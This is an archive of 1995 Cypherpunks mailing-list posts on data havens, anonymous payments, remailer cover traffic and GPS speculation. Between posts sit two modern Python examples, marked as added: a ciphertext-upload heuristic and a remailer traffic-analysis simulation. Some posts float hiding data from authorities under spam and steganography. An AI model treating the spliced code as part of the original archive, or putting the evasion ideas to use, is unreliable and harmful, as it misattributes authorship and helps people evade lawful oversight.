Thursday, January 19:
John Ousterhout, Sun Microsystems	    TCL for Internet Agents
Bill Janssen, Xerox PARC		    ILU/CORBA Inter-Language
					    Unification
Nathaniel Borenstein, 1st Virtual Holdings  Internet Information Commerce
David Chaum, Digicash b.v.		    Cash on the Internet

Friday, January 20:
Hal Varian, Univ of Michigan		    Economics of the Internet
Pavel Curtis, Xerox PARC		    The Internet at the Turn of the 
					      Millennium: How You'll Use It
					      and Who You'll Meet There
----

The keynote will be Mark Weiser of Xerox PARC talking about their
"ubiquitous computing" scheme, which has its own set of privacy
implications...

Details as I get them.

jon

Jonathan Corbet
National Center for Atmospheric Research, Atmospheric Technology Division
corbet@stout.atd.ucar.edu	     http://www.atd.ucar.edu/rdp/jmc.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 11 Jan 95 10:00:33 PST
To: lmccarth@ducie.cs.umass.edu (L. McCarthy)
Subject: Re: Storm Signals
In-Reply-To: <199501110842.DAA07468@bb.hks.net>
Message-ID: <199501111759.JAA18260@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


L. McCarthy wrote:
> Sam Kaplin writes:
> > Todd Masco writes:
> > > 	1: Somebody's roommate (a Green Beret) has been called back into
> > > 		6 months of active service.  He was not told where he'd be.
> > 
> > Perhaps Bosnia?
> 
> I doubt it. The only sort of Bosnian engagement that might make sense would
> involve a fairly conspicuous effort with a large number of troops. I can't
> see what a few thousand Green Berets could accomplish there.
> 
> Frankly, I'm quite puzzled by these signs. I can't think of any country that
> seems due for a quick invasion by the USG, but the increase in granularity of
> the GPS information suggests an operation of greater magnitude than just a
> strike against terrorists, drug cartels etc.

CNN reported on Monday that U.S. troops are being sent back to Somalia
to ensure an orderly and safe withdrawal of U.N. peacekeeping forces.

This might explain the few thousand Green Berets being sent, if this
is so. About the GPS, I have no idea, though it seems plausible.

I know this has no Cypherpunks relevance, but I see a lot of
speculation, so I thought adding what CNN is reporting might help.

--Tim

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 11 Jan 95 08:43:59 PST
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: Anonymous payment scheme
In-Reply-To: <Yr94lKjqRqWD075yn@mirage.skypoint.com>
Message-ID: <Pine.SUN.3.91.950111114155.10307B-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 8 Jan 1995, Samuel Kaplin wrote:

> Date: Sun, 08 Jan 1995 20:20:18 -0600
> From: Samuel Kaplin <skaplin@mirage.skypoint.com>
> To: Eric Hughes <eric@remailer.net>, cypherpunks@toad.com
> Subject: Re: Anonymous payment scheme
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In article <199501021344.FAA11566@largo.remailer.net>, you wrote:
> >    From: skaplin@skypoint.com (Samuel Kaplin)
> >
> >    I was looking at the bigger picture. Any merchant who accepts Visa or MC
> >    could now accept anonymous payments. No hassle at all on their part.
> >    [...]
> >    The key
> >    would be not to have the card attached to the account. If the card is
> >    attached to any type of account, then there are reporting requirements.
> >
> > Visa was talking about an electronic traveller's check, which, from
> > what I could tell, instantiated an account in the sum of the value of
> > the card purchased, which was then drawn down by purchase.  The card,
> > evidently, had no embossing on it.  Personalization was limited to
> > some account id which would last the lifetime of the balance and then
> > disappear.
> 
> This is EXACTLY what I was contemplating. I really wish they would
> implement it. Then I can get the traveler's cheques out of my wallet.
> (unsigned in both spots, of course.)

Is this not essentially the same as the current pre-paid long distance
Phone cards on the market?

One would think the transition as easy for the credit card companies to 
make with a secured, disposable visa card.


> 
> - --
> ==============================================================================
> skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
>                                        | a listing of crypto related files
> PGP encrypted mail is accepted and     | available on my auto-responder.
> preferred.                             | (Yes...the faqs are there!)
>                                        |
> E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
> Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
> ==============================================================================
>                  Be careful when playing under the anvil tree.
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> -----END PGP SIGNATURE-----
> 
> 

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Draper <crunch@well.sf.ca.us>
Date: Wed, 11 Jan 95 11:55:59 PST
To: cypherpunks@toad.com
Subject: Getting on the list
Message-ID: <199501111955.LAA29153@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I've been trying to get back on the Cypherpunks list now for over 3 weeks.
Is anyone out there on the list that has the power to get me added?  I tried
the usual request to cypherpunks-request@toad.com, but haven't been
successful.

Who is maintaining the list these days?   Does it still exist?  And
why haven't any of my requests been hohored?
thats honored...

Thanx
John D.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 11 Jan 95 08:56:21 PST
To: wcs@anchor.ho.att.com
Subject: Re: Data Haven problems
In-Reply-To: <9501090448.AA14477@anchor.ho.att.com>
Message-ID: <Pine.SUN.3.91.950111114558.11283A-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 8 Jan 1995 wcs@anchor.ho.att.com wrote:

> Date: Sun, 8 Jan 95 23:48:36 EST
> From: wcs@anchor.ho.att.com
> To: dfloyd@io.com
> Cc: cypherpunks@toad.com
> Subject: Re: Data Haven problems
> 
> dfloyd asks for ideas about preventing spamming in data havens,
> for the code that he's working on.  It's a hard job.
> A related problem is how to prevent your data haven from becoming
> the porno-ftp site of the week, and either being swamped with
> traffic or raided by the Post Office Reactionary Neighborhood Police.
> 

[Problems of payment schemes and lack of anonymous payment infrastructure 
deleted]

> Some operators may find it useful to limit the amount of data
> that can be stored or retrieved by a specific user or site, 
> though this is less useful with anonymous and pseudonymous remailers
> around, since "a specific user" becomes vaguer.
> 
> Filtering by filename and type can also be useful - if you don't allow
> files named *.gif and *.jpg, users may be less likely to
> spam you with pornography.  Namespace control in general is an issue -
> do users get to choose filenames, or list directories, or do they
> have to know the names of files to retrieve. 
> Another issue is whether files can only be retrieved by the sender -
> probably a local policy issue.  

To some degree this requires the evaluation of the "authority attention" 
level the data haven has achieved.  If the real sensitive data is more 
extreme than a porn deposit, (I assume we are talking 'legal' and not 
kiddie porn BTW) then the spam involved will serve to properly mask, to 
some degree, stego'd files within the porn.  Part of a data haven, it 
seems to me, will be security by obscurity.  Just on the basic level that 
a haven with all encrypted files will be somewhat secure by obscure, in 
that the authority most likely to be interested in the data probably will 
not be attentive.  A repository holding some legitimate spam, be it porn 
or gifs or whatever, is unlikely to attract the level of SERIOUS 
attention that the sensitive data it contains may warrant.

To sum:  Spam's usefulness is a function of current authority attention, 
likely authority attention and authority attention the sensitive data 
warrants.

 
> Some sites may only accept encrypted files, which reduces the spam 
> potential considerably, as well as reducing your exposure to the
> porn police, though it's difficult to do anything about files that are
> encrypted with a public key whose private key has been posted to the net,
> or fake crypto headers in an otherwise unencrypted file,
> unless you put in lots more code to check the insides of files and
> watch the net for such postings, which is unrealistic.  There's also
> the problem that PGP and especially RIPEM files are non-stealthy,
> and users may not want to leave even keyids in their files.

A better policy might be to encrypt all files that are not encrypted, 
perhaps through some key assignment system.  The spam thus adds to the 
total traffic analysis problem, and the security of the spam is not 
material.  i.e. better encrypted spam than plaintext spam.

> 		Bill
> 

-uni- (Dark)

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
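
An added example, not part of the original posts: one way an operator could implement the "check the insides of files" step mentioned above for an encrypted-only upload policy. The thresholds, function names and sample uploads are assumptions made for illustration; the check is a heuristic and, as the quoted text notes, it cannot tell whether the matching private key has been published.

```python
import base64
import binascii
import hashlib
import math
from collections import Counter

BEGIN, END = "-----BEGIN PGP MESSAGE-----", "-----END PGP MESSAGE-----"
MIN_BYTES = 2048    # assumed: below this the byte histogram is too sparse to judge
MIN_ENTROPY = 7.5   # assumed threshold in bits per byte (ciphertext is close to 8.0)
# Cleartext image signatures tied to the *.gif / *.jpg filter discussed above.
CLEAR_MAGIC = {b"GIF87a": "gif", b"GIF89a": "gif", b"\xff\xd8\xff": "jpeg"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte (0.0 to 8.0) computed from the byte histogram."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(n / total * math.log2(n / total) for n in Counter(data).values())


def armor(data: bytes) -> str:
    """Wrap bytes in PGP-style ASCII armor (no CRC line); used to build samples."""
    b64 = base64.b64encode(data).decode("ascii")
    body = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return f"{BEGIN}\nVersion: 2.6.2\n\n{body}\n{END}\n"


def dearmor(text: str):
    """Return the decoded armor body, or None if the armor is missing or invalid."""
    lines = [line.strip() for line in text.splitlines()]
    try:
        start = lines.index(BEGIN)
        end = lines.index(END, start)
    except ValueError:
        return None
    block = lines[start + 1:end]
    if "" in block:                      # armor headers end at the first blank line
        block = block[block.index("") + 1:]
    # Lines starting with "=" carry the armor checksum, not payload.
    b64 = "".join(l for l in block if l and not l.startswith("="))
    try:
        return base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify_upload(text: str) -> str:
    """Accept only uploads whose armored payload looks like ciphertext."""
    payload = dearmor(text)
    if payload is None:
        return "reject:no-valid-armor"
    for magic, kind in CLEAR_MAGIC.items():
        if payload.startswith(magic):
            return f"reject:cleartext-{kind}"
    if len(payload) < MIN_BYTES:
        return "reject:too-short-to-judge"
    if shannon_entropy(payload) < MIN_ENTROPY:
        return "reject:low-entropy"
    # Limitation: compressed archives are also high-entropy and will pass here.
    return "accept"


def pseudo_random(n: int) -> bytes:
    """Deterministic stand-in for ciphertext: SHA-256 in counter mode."""
    out = b"".join(hashlib.sha256(i.to_bytes(4, "big")).digest()
                   for i in range(n // 32 + 1))
    return out[:n]


def constructed_samples() -> dict:
    """Constructed uploads: one ciphertext-like, three with fake crypto headers."""
    prose = b"Quarterly report, draft 3. Nothing here is encrypted.\n" * 60
    return {
        "ciphertext-like": armor(pseudo_random(4096)),
        "armored-plaintext": armor(prose),
        "armored-gif": armor(b"GIF89a" + pseudo_random(4096)),
        "raw-text-in-armor": f"{BEGIN}\n\nMeet at noon, bring the files.\n{END}\n",
    }


if __name__ == "__main__":
    for name, upload in constructed_samples().items():
        print(f"{name:20s} {classify_upload(upload)}")
```
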





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 11 Jan 95 09:17:08 PST
To: Alan Bostick <abostick@netcom.com>
Subject: Re: Data Haven problems
In-Reply-To: <ZwQ4lyczBSQA075yn@netcom.com>
Message-ID: <Pine.SUN.3.91.950111121303.11283F-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Jan 1995, Alan Bostick wrote:

> Date: Mon, 09 Jan 1995 13:46:11 -0800
> From: Alan Bostick <abostick@netcom.com>
> To: wcs@anchor.ho.att.com, dfloyd@io.com
> Cc: cypherpunks@toad.com
> Subject: Re: Data Haven problems
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In article <9501090448.AA14477@anchor.ho.att.com>, you wrote:
> 
> > Filtering by filename and type can also be useful - if you don't allow
> > files named *.gif and *.jpg, users may be less likely to
> > spam you with pornography.  Namespace control in general is an issue -
> > do users get to choose filenames, or list directories, or do they
> > have to know the names of files to retrieve. 
> > Another issue is whether files can only be retrieved by the sender -
> > probably a local policy issue.  
> 
> Pornographic images aren't spam _per_se._ What makes them troublesome is
> the huge number of people who wish to download them when their
> availability is widely known.  (My ISP's ftp site is being bogged down
> by lots of accesses; it is speculated that these are people trying to
> access pornography kept there.)

In many ways this shows how publicly available porn could just pummel 
traffic analysis.

> 
> The obvious fix here is the same as the proposed fix for remailer
> spamming:  charge for access.
> 
> As a (presumably) fixed-location data haven, one would want to be able
> to use some kind of anonymous e-money for payment, but one could also
> use good, old-fashioned credit card numbers, too.
> 
> The feelthy peexture business might well be the cash cow that keeps a
> data-haven/fortress remailer afloat (if that's not too mixed a metaphor).
> 
>                           | PROOF-READER, n: A malefactor who atones for
>    Alan Bostick           | making your writing nonsense by permitting
>    abostick@netcom.com    | the compositor to make it unintelligible.
> finger for PGP public key |      Ambrose Bierce, THE DEVIL'S DICTIONARY
> Key fingerprint:          | 
> 50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79  +legal_kludge=off
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.1
> 
> iQB1AgUBLxGxHOVevBgtmhnpAQEEnAL/blauOWwrahdpEK+NbH4WC5V5fekmUYdg
> tT5VU+d2C5PGF9Bm5cXtNlZczbI84f+jsBmxRDlXQAsec56D7M7ZwjBMcp2X8t9Z
> +FlsU90fRN3NGbYOK/vlSOmzjPBQxf8A
> =gvPB
> -----END PGP SIGNATURE-----
> 

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick -- henry strickland <strick@versant.com>
Date: Wed, 11 Jan 95 12:23:53 PST
To: cypherpunks@toad.com
Subject: Microsoft TrueName(tm)
Message-ID: <199501112023.MAA19659@gwarn.versant.com>
MIME-Version: 1.0
Content-Type: text/plain


brat@apple.com found this somewhere....   strick



Microsoft Clarifies Trademark Policies

REDMOND, Washington--January 4, 1995--In response to customer
inquiries, Microsoft today clarified the naming policy for Bob(tm), its
new software product designed for computer beginners.  Contrary to
rumors, Microsoft will not demand that all persons formerly named "Bob"
immediately select new first names.

    "I don't know where these rumors come from," commented Steve
Balmer, Microsoft Executive Vice President for Worldwide Sales and
Support.  "It's ridiculous to think Microsoft would force people
outside the computer industry to change their names.  We won't, and our
licensing policies for people within the industry will be so reasonable
that the Justice Department could never question them."

    Balmer said employees of other computer companies will be given the
opportunity to select new names, and will also be offered a licensing
option allowing them to continue using their former names at very low
cost.

    The new licensing program, called Microsoft TrueName(tm), offers
persons who want to continue being known by the name Bob the option of
doing so, with the payment of a small monthly licensing fee and upon
signing a release form promising never to use OpenDoc.  As an added
bonus, Bob name licensees will also be authorized to display the
Windows 95 logo on their bodies.

    Persons choosing not to license the Bob name will be given a 60-day
grace period during which they can select another related name.  "We're
being very lenient in our enforcement of the Bob trademark," said Bill
Newkom, Microsoft's Senior Vice President of Law and Corporate
Affairs.  "People are still free to call themselves Robert, Robby, or
even Rob.  Bobby however is derivative of Microsoft's trademark and
obviously can't be allowed."

    Microsoft also announced today that Bob(tm) Harbold, its Executive
Vice President and Chief Operating Officer, has become the first
Microsoft TrueName licensee and will have the Windows 95 logo tattooed
to his forehead.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NetSurfer <jdwilson@gold.chem.hawaii.edu>
Date: Wed, 11 Jan 95 09:23:34 PST
To: cypherpunks@toad.com
Subject: Re: Storm Signals
Message-ID: <199501111727.MAA11495@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


> The call up could possibly be related to the repatriation of the Haitian
> boat people or even a continued presence in Haiti. I think Aristide still

This past week we had a number of personnel sent to Haiti for the next 6
months.  

- -NetSurfer

#include <standard.disclaimer>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
==  =     = |James D. Wilson        |V.PGP 2.7:   512/E12FCD 1994/03/17 >
 "  "  o  " |P. O. Box 15432        |     finger for full PGP key        >
 "  " / \ " |Honolulu, HI  96830    |====================================>
\"  "/ G \" |Serendipitous Solutions|    Also NetSurfer@sersol.com      >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>




- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxQU5yoZzwIn1bdtAQFVCQF/eZvusPABHtYtkIMm/q/AADIcaJtZ1Fna
m202XMn6gdjl0j0SQAx9TEW9bt+pOxW+
=OzIN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Wed, 11 Jan 95 10:59:24 PST
To: cypherpunks@toad.com
Subject: Re: Storm Signals
In-Reply-To: <199501111759.JAA18260@netcom10.netcom.com>
Message-ID: <199501111859.AA02457@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Not relevant to cypherpunks-- just call me Carol Anne--

If I were the DOD, I would set the standard GPS default to selective
availability. After all, with SA on, military receivers can still get
fine positioning data. If someone could come up with a good reason to
turn SA off, great, but I wouldn't leave it on otherwise.

The scenarios concerning GPS-piloted Cessnas full of nasty stuff come
to mind, especially vis-a-vis the North Koreans. They probably don't
have accurate IRBMs but they certainly could cobble together a
Learjet-based delivery system.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Good software engineering doesn't reduce the 
perobich@ingr.com            | amount of work you put into a product; it just 
Not speaking for Intergraph. | redistributes it differently.
                  ### http://www.intergraph.com ###

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxQqpafb4pLe9tolAQGMfAP/WeMcDorjNsko7Qcvb34lPdg30/IHSJNV
FoG2DOjwyBJhopHeeEpzzm629U2y7jM5+ipoTNl6DLh5tjJ3gQVfi0Lz6b/iyL+j
iXH4F15Hws55g07ZRQ9r+JGTL33mP5G1RAg/dfeXixvS2uXTWSknF37tQdVZFpzA
2USM2cnEsPU=
=71jL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an158409@anon.penet.fi (beacher)
Date: Wed, 11 Jan 95 06:33:03 PST
To: cypherpunks@toad.com
Subject: privacy digest
Message-ID: <9501111321.AA25946@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



I am extremely sympathetic to the anti-abortion cause but the kind of abuse
described in this item is unnerving.  Although illegal and reprehensible, it is
one thing for a government official, because of some strong conviction, to
violate the law.  It is completely another to violate it for money.  Men, if
they were men, who did this should have their privacies cut off.


Subject:    Computer Privacy Digest V6#003

Computer Privacy Digest Sat, 07 Jan 95              Volume 6 : Issue: 003

-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Avi Harris Baumstein <avi@clas.ufl.edu>
Date: Wed, 11 Jan 95 10:42:15 PST
To: cypherpunks@toad.com
Subject: anti clipper graffiti
Message-ID: <199501111841.NAA09940@cutter.clas.ufl.edu>
MIME-Version: 1.0
Content-Type: text/plain



check out:

	<http://wps.com/anti-clipper-graffiti.gif>

and while you've got mosaic going, check this out on the same server:

	<http://wps.com/toilet/toilet.html>

-avi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Wed, 11 Jan 95 04:46:29 PST
To: cypherpunks@toad.com
Subject: TCM on BBC
In-Reply-To: <ab3820b50302100417b7@DialupEudora>
Message-ID: <Pine.HPP.3.91.950111134030.6425A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:

> (I'll be travelling to LA on Friday, for
> a television interview with the BBC on
> crypto, and so will be unwired that day.)

Please announce the date and time of the broadcast
(if they tell you).

Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Wed, 11 Jan 95 15:10:45 PST
To: cypherpunks@toad.com
Subject: Remailer traffic loads?
Message-ID: <Chameleon.4.01.950111151026.jcorgan@jcorgan.sj.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Is there someplace that remailer operators routinely post information
about traffic load?

The reason I ask is that this issue can have a bearing on selection of
remailers for chaining.  Using Raph's list, one can gather an approximate
feel for latency and reliability, but there is no way to know if a
site is forwarding hundreds or thousands of messages a day (which would be
good for traffic analysis), or just a few tens (which makes in/out analysis
much easier.)

Raph's list is a good 'reputation' system; however, it lacks this one bit
of info which would be immensely helpful.  Periodic postings of remailer
frequency usage to alt.privacy.anon-server by the operators would be one
way to propagate this info.

Of course, I may be overlooking something basic:  Would posting this info
pose any kind of security weakness?  I imagine not; if someone wants to get
this info for traffic analysis, they just watch the remailer for a day or
so.

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxRlJU1Diok8GKihAQHdJgP+IlVlKRkCbZQCjr9VgEgWLt0dY2jP4s5k
WcRkpBHXnFxV2nkM2zF9L/UMf1hKkfcdqZj5FuLWLUE48pPvfZuhRebMq8BBay6R
5k0PiA095561uJb6T1mIwm+Tb3x/KZ/ZCMceoe5SA2lu8b6vmh+QdS/ZOc1aFsIj
rhrquyzeCZs=
=yjPJ
-----END PGP SIGNATURE-----
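
An added example, not part of the original post: a small simulation of why the daily traffic figure asked about above matters when choosing remailers for a chain. It assumes a simplified remailer that holds each message for a uniformly random delay up to a maximum latency, and an observer who sees only arrival and departure times; the function names and parameters are hypothetical.

```python
import bisect
import math
import random
from typing import NamedTuple


class MixStats(NamedTuple):
    mean_bits: float          # average log2(size of candidate-sender set)
    linkable_fraction: float  # share of outputs with exactly one candidate input


def simulate_remailer(msgs_per_day: int, max_delay_h: float,
                      days: int = 7, seed: int = 1995) -> MixStats:
    """Timing-only in/out analysis against one remailer.

    For every outgoing message the observer lists all inputs that arrived
    within the preceding max_delay_h hours. With a uniform delay each of
    those k inputs is equally likely, so the sender hides among k candidates
    and the observer's uncertainty is log2(k) bits.
    """
    rng = random.Random(seed)            # fixed seed: constructed, repeatable data
    horizon = 24.0 * days
    arrivals = sorted(rng.uniform(0.0, horizon)
                      for _ in range(msgs_per_day * days))
    bits, linkable = [], 0
    for arrived in arrivals:
        sent = arrived + rng.uniform(0.0, max_delay_h)
        lo = bisect.bisect_left(arrivals, sent - max_delay_h)
        hi = bisect.bisect_right(arrivals, sent)
        k = max(1, hi - lo)              # the true input is always a candidate
        bits.append(math.log2(k))
        if k == 1:
            linkable += 1
    return MixStats(sum(bits) / len(bits), linkable / len(arrivals))


def compare_loads(loads=(30, 300, 2000), max_delay_h: float = 1.0) -> dict:
    """Same latency, different daily volumes: what a published load figure reveals."""
    return {load: simulate_remailer(load, max_delay_h) for load in loads}


if __name__ == "__main__":
    for load, stats in compare_loads().items():
        print(f"{load:5d} msgs/day: {stats.mean_bits:5.2f} bits of cover, "
              f"{stats.linkable_fraction:6.1%} of messages trivially linkable")
```

Two remailers with the same measured latency can give very different cover, which is why latency and reliability figures alone do not settle the choice.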






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Wed, 11 Jan 95 11:59:43 PST
To: cypherpunks@toad.com
Subject: Re: Storm Signals
In-Reply-To: <WHw4lKjqRq69077yn@mirage.skypoint.com>
Message-ID: <199501112004.PAA12969@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Samuel Kaplin <skaplin@mirage.skypoint.com> wrote:
>Perhaps it is two unrelated events. Maybe the Russians are using GPS in
>their attack on Chechnya, and the administration decided "Not on our dime."

To clarify a little bit:  I summarized wrongly.  The GPS fine location has
not been turned off, the dithering has been turned off.  In essence,
the GPS fine positioning usually lies in a particular algorithmic way
designed to make determining exact locations extremely difficult.

In theory, the military GPS units bypass this dithering.  Either it doesn't
work or there aren't enough military units (I believe the latter is the
official story), but GPS fine positioning has been turned off during times
like the Iraq massacre and the Haiti invasion so that the military can
use civilian units.

In any case, it turns out that the Green Beret in question is being sent
to Haiti.  It doesn't explain the GPS, tho.  There's lots-o-speculation
elsewhere on the net.
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxP++hNhgovrPB7dAQGUowQAgvqyOzrVxCWnumcPQyPbrWnuxn+017Wf
DBM/A5VCqyzj/wpZYgBydBwZknzEYd8vxLdt32j2rlhzswHCHdsvECuN7aer9S7t
69ZlrtPn1UKy5MvTUyAdvxh5Z8Zex1eenyYd8q+favmrAB9UmX4Sh1e4JkYqPRmP
is2vZ8DgAIQ=
=Lmyl
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxQ5wCoZzwIn1bdtAQGWPgGAwLlWR8brXeavxwrV4CxvCK1XMZgCY8pq
MixVBWLp0eti/cbmDzSS/8x9gle8PUgL
=VtmS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 11 Jan 95 15:37:16 PST
To: cypherpunks@toad.com
Subject: Re:  Storm Signals
Message-ID: <199501112337.PAA20199@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> > > > 	1: Somebody's roommate (a Green Beret) has been called back into
> > > > 		6 months of active service.  He was not told where he'd be.
> > > Perhaps Bosnia?
> > 
> > I doubt it. [...]
> > 
> 
> Military action also requires political will, and with the recent change
> in power in the US govt there is no way anything is going to happen for at
> least six months.  Freshmen congressmen do not sign off on a war the first


True.  But clandestine operations don't require the approval of 
Congress.  In fact, the prez never has to admit they exist.  Ever.  Read 
the Pentagon Papers.

-Rat





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pierre Uszynski <pierre@shell.portal.com>
Date: Wed, 11 Jan 95 16:05:01 PST
To: cypherpunks@toad.com
Subject: Remailing pricing and cover traffic
Message-ID: <199501120004.QAA24479@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



We have been debating payment systems for remailers under the
following assumptions:

a) Reliable remailers will have to justify professional management
by making money for their owners.

b) End-of-chain remailers will need to make money to cover for
their legal expenses.

c) Payment would limit abuse.

I already countered the last point. Let me try to deal with the first
two to conclude that many professionally run remailers may very well
stay free or close to that for a long time:

Remailers are only one of many kinds of businesses that have been
described on this list. Others will include reputation markets,
near-traditional banking systems, stamp issuers, certification
agencies, data havens etc... But we have also seen that nearly all
other forms of businesses already now cannot but run afoul of a
tentacular law at some time or other. We have concluded that many of
these businesses would migrate to cypherspace, hiding their locations,
owners, books, assets and other information too dangerous to keep in
the open.

Each such organisation will generate lots of traffic, in part under
control of whoever is trying to do business with it. So they are
potentially easily traceable and subject to legal or violent
consequences.  A possible solution is of course for their sites to be
remailers too. Lots of non-descript remailers, trading lots of
encrypted traffic, a lot of it remailer management info and bogus
filler traffic.  When you are one of many, and people correspond with
you only through limited traffic anonymous response blocks, then the
remailers help you stay hidden by providing cover traffic.

But for this to work you must consistently attract a lot of cover
traffic through your remailer(s). If others undercut your stamp price,
or best your reliability status, you are in trouble because traffic
will migrate to other more competitive remailers, and you will be left
dry on the sand with the task to generate believable cover traffic
yourself. You are also competing with the cypherspace customers hiding
their own personal traffic under cover of "everyone-a-remailer"
remailers.

It may well be much simpler for cypherbusinesses to stay competitive on
the "middle" remailer market, even at a loss, and to transmit volumes of
believable (because real) cover traffic. End-of-chain (or more
precisely "clear-text") remailers can be expected to be a minority as,
after all, they are only needed to post to public forums. Maybe these
will charge a fee. For the others, the more and bigger "porn GIFs" go
through (even for free), the better...

However, large free remailers may then arouse suspicion: There is little
reason to run a heavy traffic remailer for free, apart from getting
cover traffic. Competition may then settle at a small price, far from
enough to keep the remailer running, but enough to not be too
conspicuous. Or better, non-profit remailers may become ubiquitous,
being used in part to provide cover traffic and in part to transfer
money from the cypherspace businesses to cover for the cost of the
computers and obvious living expenses.

Between cypherbusinesses, everyone-a-remailer operations, and a few
real non-profits, most remailing may stay close to free for a long
time.  Untraceable money will be useful for all kinds of things, but
maybe not so much for remailing.

Pierre.
pierre@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 11 Jan 95 14:29:28 PST
To: Syed Yusuf <cypherpunks@toad.com>
Subject: Re: FBI and BLACKNET
